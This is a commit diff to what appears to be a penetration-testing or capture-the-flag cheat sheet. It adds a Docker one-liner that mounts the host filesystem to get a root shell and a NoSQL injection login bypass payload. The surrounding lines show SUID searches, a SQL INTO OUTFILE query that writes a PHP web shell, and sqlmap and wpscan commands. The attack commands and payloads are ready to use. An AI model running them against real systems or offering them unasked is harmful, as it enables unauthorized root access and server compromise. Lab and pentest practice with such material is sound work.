nosql and docker root added

Leetcore · Sep 22, 2022 · 410ecf1 · 410ecf1
1 parent b235e9c
commit 410ecf1
Showing 1 changed file with 6 additions and 0 deletions.
diff --git a/1337_file.txt b/1337_file.txt
@@ -160,6 +160,9 @@ find / -perm -4000 2>/dev/null
 From user to root (Privilege Escalation)
 find / -perm +6000 2> /dev/null
 
+# Docker (priv, escalation, root)
+docker run -v /:/mnt --rm -it alpine chroot /mnt sh
+
 Read root files with error messages (unstable):
 command_you_can_run --var-in-there="/root/flag.txt"
 
@@ -254,6 +257,9 @@ select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/she
 Save full request with header and body in request.txt:
 sqlmap -R request.txt --batch --random-refer
 
+# nosql injection (SQL):
+username=admin&password[$ne]=admin
+
 # WPSCAN
 enumerate plugins, themes etc
 wpscan --url http://domain -e vp,dbe,cb